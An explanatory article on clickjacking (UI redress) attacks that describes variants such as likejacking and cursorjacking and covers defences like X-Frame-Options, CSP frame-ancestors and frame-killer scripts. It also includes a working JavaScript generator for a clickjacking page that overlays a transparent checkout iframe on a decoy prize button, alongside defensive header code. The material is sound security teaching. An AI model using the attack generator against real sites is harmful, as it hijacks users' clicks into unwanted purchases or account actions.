What is the clickjacking or UI redress attack?
Clickjacking, also called a UI redress attack, is an attack in which the attacker overlays a transparent (or deceptively styled, opaque) layer on a webpage so that a victim who believes they are clicking a harmless link or button actually clicks a control on a different page, typically one on which the victim is already logged in. The attacker thus hijacks the user's click: the browser delivers it, together with the victim's session cookies, to a page the victim never intended to interact with.
How does the clickjacking or UI redress attack work?
Clickjacking takes several forms:
- An attacker tricks a user into clicking a "like" button or posting an update on a social networking website. Most of us have seen this on popular social networks; this variant is called likejacking.
- The attacker displaces the user's cursor so that it appears to point somewhere other than where the click will actually land; this variant is called cursorjacking.
- Password managers that auto-fill credentials into frames or after redirects can be abused: if the manager fills a login form inside an invisible iframe, or on a page reached through a redirect, the attacker's page obtains passwords the user never meant to submit.
- Unwanted advertisements are displayed on top of an email inbox or a similar web application. When the user clicks the malicious ad, the click lands in an invisible iframe that performs actions in the user's account, such as deleting all messages.
- The attacker loads a settings page (historically, the Adobe Flash Player settings manager) into an invisible iframe and tricks the user into clicking the controls that grant the attacker's page access to the microphone, the camera, etc.
- Users often stay logged in to e-commerce websites. An attacker can load the e-commerce site in a transparent iframe positioned over a social media "like" button; when the user clicks the button, the click actually lands on the store's purchase control, and an expensive item is bought with the user's stored credit card.
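The variants above all rely on the same layering trick. The following is an added example, not code from the original article: it generates the attacker's page for the e-commerce scenario, showing the CSS that makes the overlay work and how the iframe offset is computed so that the victim site's real button lands exactly over the decoy. The target URL, button sizes and pixel coordinates are hypothetical.

```javascript
// Added example (not from the article): the geometry of a clickjacking page.
// The attacker's page shows a harmless-looking decoy button and places the
// victim site in a transparent iframe *above* it (higher z-index), shifted so
// that the victim's real button sits exactly over the decoy. The click goes
// to the top-most layer, i.e. the invisible iframe, with the user's cookies.
// All URLs and pixel coordinates below are hypothetical.

// targetButton: where the real button is inside the framed page.
// decoy: where the decoy is drawn on the attacker's page.
// Both are page-relative CSS pixels.
function overlayOffset(targetButton, decoy) {
  // Shift the iframe so that targetButton's top-left lands on decoy's top-left.
  return {
    left: decoy.left - targetButton.left,
    top: decoy.top - targetButton.top,
  };
}

function buildClickjackPage({ targetUrl, targetButton, decoy, frame }) {
  const { left, top } = overlayOffset(targetButton, decoy);
  return `<!doctype html>
<html><head><meta charset="utf-8"><style>
  /* Decoy: visible, drawn underneath (lower z-index). */
  #decoy { position:absolute; left:${decoy.left}px; top:${decoy.top}px;
           width:${targetButton.width}px; height:${targetButton.height}px; z-index:1; }
  /* Victim page: fully transparent, drawn on top, so it receives the click. */
  #victim { position:absolute; left:${left}px; top:${top}px;
            width:${frame.width}px; height:${frame.height}px;
            opacity:0; border:0; z-index:2; }
</style></head><body>
  <button id="decoy">Claim your free prize</button>
  <iframe id="victim" src="${targetUrl}" scrolling="no"></iframe>
</body></html>`;
}

// Constructed scenario (hypothetical): the framed checkout page's "Confirm
// purchase" button is 400px from the left and 300px from the top; the decoy
// is drawn at (120, 80) on the attacker's page.
const EXAMPLE = buildClickjackPage({
  targetUrl: "https://shop.example/checkout",
  targetButton: { left: 400, top: 300, width: 160, height: 40 },
  decoy: { left: 120, top: 80 },
  frame: { width: 1200, height: 900 },
});

module.exports = { overlayOffset, buildClickjackPage, EXAMPLE };
```

Saving the generated markup as an HTML file and opening it in a browser (against a site that does not send the anti-framing headers discussed below) shows an ordinary-looking button; the transparent iframe is what actually receives the click. Setting `opacity` to a small non-zero value while experimenting makes the alignment visible.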
How to prevent clickjacking or UI redress attacks?
Several measures, on the client side and on the server side, help prevent this attack.
- Browser add-ons such as NoScript (through its ClearClick feature) can stop users from clicking on invisible or obscured page elements. A separate guide on hardening browser security and privacy covers such add-ons in more depth.
- Commercial products such as GuardedID make every frame on the page visible, so that an overlaid frame cannot stay hidden.
- In research browsers such as Gazelle, a window from one origin may draw dynamic content over another window's screen space only if that content is opaque, so the user cannot be made to click on something they cannot see.
- Website owners can include frame-killer (frame-busting) JavaScript snippets that refuse to render the page when it is not the top-level document. These scripts are a legacy fallback: they can be defeated, for example by loading the page in an iframe with the sandbox attribute so that its script never runs, so they should back up the response headers below rather than replace them.
- Web browsers honour the X-Frame-Options response header (DENY or SAMEORIGIN), which blocks framing by other sites. It cannot express an allow-list of specific third-party origins (the ALLOW-FROM value is obsolete and ignored by current browsers), which is why it prevents clickjacking only partially.
- The frame-ancestors directive of Content Security Policy lets the site state exactly which origins may embed it with iframe, object, embed, etc., and so prevents potentially hostile pages from framing it. When both headers are present, browsers that support CSP follow frame-ancestors and ignore X-Frame-Options; sending both is the recommended practice.
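The three server-side measures (frame-killer script, X-Frame-Options, and CSP frame-ancestors) interact, and it is easy to deploy a header that does not do what one expects. The following is an added example, not code from the original article: it models, in simplified form, how a browser decides whether a response may be framed from a given origin, builds the header pair a server should send, and carries the legacy frame-killer snippet. The origins used are hypothetical, the source-expression matcher supports only the common forms ('none', 'self', scheme sources, host sources with a leading wildcard), and only the direct embedder is checked, whereas real browsers check every ancestor frame.

```javascript
// Added example (not from the article): a simplified model of the browser's
// framing decision. Assumptions: CSP frame-ancestors, when present, takes
// precedence over X-Frame-Options (as the CSP specification requires);
// X-Frame-Options values other than DENY/SAMEORIGIN (including the obsolete
// ALLOW-FROM) are ignored, as current browsers do; only the direct embedder
// is checked, not every ancestor. All origins are hypothetical.

// Match one frame-ancestors source expression against the embedder's origin.
function sourceMatches(source, embedderOrigin, pageOrigin) {
  const embedder = new URL(embedderOrigin);
  if (source === "'none'") return false;
  if (source === "*") return true;
  if (source === "'self'") return embedderOrigin === pageOrigin;
  // Scheme source, e.g. "https:" matches any https embedder.
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) {
    return embedder.protocol.toLowerCase() === source.toLowerCase();
  }
  // Host source: [scheme://]host[:port]; host may begin with "*." (subdomains only).
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/i.exec(source);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme.toLowerCase() + ":" !== embedder.protocol) return false;
  const eh = embedder.hostname.toLowerCase();
  const h = host.toLowerCase();
  const hostOk = wildcard ? eh.endsWith("." + h) : eh === h;
  if (!hostOk) return false;
  if (port && port !== "*") {
    const ep = embedder.port || (embedder.protocol === "https:" ? "443" : "80");
    if (ep !== port) return false;
  }
  return true;
}

// Decide whether a response carrying `headers` (a plain object, any name
// casing) may be framed by a document at embedderOrigin. true = allowed.
function framingAllowed(headers, pageOrigin, embedderOrigin) {
  const get = (name) => {
    const k = Object.keys(headers).find((h) => h.toLowerCase() === name);
    return k ? headers[k] : undefined;
  };
  const csp = get("content-security-policy");
  if (csp) {
    const directive = csp.split(";").map((d) => d.trim())
      .find((d) => /^frame-ancestors\b/i.test(d));
    if (directive) {
      // An empty source list behaves like 'none'.
      const sources = directive.split(/\s+/).slice(1);
      return sources.some((s) => sourceMatches(s, embedderOrigin, pageOrigin));
    }
  }
  const xfo = get("x-frame-options");
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === "DENY") return false;
    if (v === "SAMEORIGIN") return embedderOrigin === pageOrigin;
    return true; // ALLOW-FROM / malformed: header ignored, framing allowed
  }
  return true; // no header at all: any site may frame the page
}

// Headers a server should send. frame-ancestors is the primary control;
// X-Frame-Options is kept for old browsers that ignore CSP. Pass [] to
// forbid framing entirely, ["'self'"] for same-origin framing, or a list of
// origins; only the first two have an X-Frame-Options equivalent.
function antiClickjackingHeaders(allowedAncestors = []) {
  const sources = allowedAncestors.length ? allowedAncestors.join(" ") : "'none'";
  const headers = { "Content-Security-Policy": `frame-ancestors ${sources}` };
  if (allowedAncestors.length === 0) headers["X-Frame-Options"] = "DENY";
  else if (allowedAncestors.length === 1 && allowedAncestors[0] === "'self'") {
    headers["X-Frame-Options"] = "SAMEORIGIN";
  }
  return headers;
}

// Legacy frame-killer, to be placed in <head>. The page stays hidden unless
// the script runs and finds itself at the top level. It only helps when the
// script executes: an <iframe sandbox="allow-forms"> disables it, so treat
// it as a fallback behind the headers above, not as the defence.
const FRAME_KILLER = `<style id="antiCJ">body{display:none !important;}</style>
<script>
  if (self === top) {
    document.getElementById("antiCJ").remove();
  } else {
    top.location = self.location;
  }
</script>`;

module.exports = { sourceMatches, framingAllowed, antiClickjackingHeaders, FRAME_KILLER };
```

In a Node.js handler, the output of `antiClickjackingHeaders` is applied with `res.setHeader(name, value)` for each entry before the body is written. Running `framingAllowed` against the headers a site actually returns, for the origins that are expected to embed it, is a quick way to confirm that a partner allow-list such as `frame-ancestors 'self' https://*.partner.example` admits the partner's subdomains and nothing else.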
So, be aware of these vulnerabilities and stay safe and secure. This article gives a brief overview of the clickjacking or UI redress attack. Readers who want more information on other web application attacks and their preventive measures may want to refer to the book "Web Application Vulnerabilities And Prevention."